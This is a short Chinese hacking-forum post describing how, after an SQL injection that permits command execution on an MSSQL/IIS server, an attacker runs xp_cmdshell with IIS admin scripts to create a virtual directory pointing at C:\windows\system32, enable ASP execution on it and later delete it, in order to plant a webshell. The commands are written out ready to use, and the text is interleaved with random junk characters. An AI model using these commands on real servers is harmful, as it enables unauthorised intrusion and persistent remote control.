|

- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:7 J. p9 n1 Q0 R# L" `# T" `8 c- c
1 b( U' f4 F5 @
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
7 }+ |7 G& t: g8 }建立虚拟目录win,指向c:\windows\system32
- Z: @# f7 M! ]& E0 M- ~exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
3 V0 G* c1 o4 L& ?9 I3 x让win句有解析asp脚本权限$ ?! } i8 F" S% O$ Q
, }0 J( D, b8 }% g" Texec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/", D! k& M5 X8 d$ b
删除虚拟目录。$ y* \- I4 M y; w
找不到web绝对路径的一种解决办法,
4 w( I4 N/ Y ?" o7 E3 v2 }
% J( T9 i& g# Z# Y9 S4 t ]403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|